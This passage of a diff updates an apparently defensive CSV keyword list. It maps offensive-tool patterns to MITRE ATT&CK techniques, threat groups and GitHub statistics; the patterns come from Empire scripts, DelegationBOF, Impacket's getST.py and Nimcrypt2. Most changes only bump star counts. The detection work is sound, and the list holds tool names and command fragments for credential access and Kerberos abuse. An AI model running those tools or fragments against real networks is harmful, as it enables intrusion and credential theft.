Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*getsploit*","offensive_tool_keyword","getsploit","Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.","T1583 - T1584 - T1586","TA0007","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/getsploit","1","0","N/A","N/A","10","1668","255","2023-03-27T15:18:55Z","2017-06-04T09:31:44Z" +"*Get-SPN.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-spns All*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns ASREP*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-spns spns*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*Get-SQLInstanceDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SQLInstanceDomain.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLInstanceDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SQLInstanceDomain.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLInstanceDomain.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-SqlServerLinkCrawl*","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SQLSysadminCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLServerLoginDefaultPw*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1097","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SQLSysadminCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SQLServerLoginDefaultPw.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getST.py -k -no-pass -spn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*GetSyscallStub.nim*","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","7","651","113","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" -"*Get-System.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SystemDNSServer.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SystemDNSServer.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-SystemNamedPipe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-System.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-SystemDNSServer.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
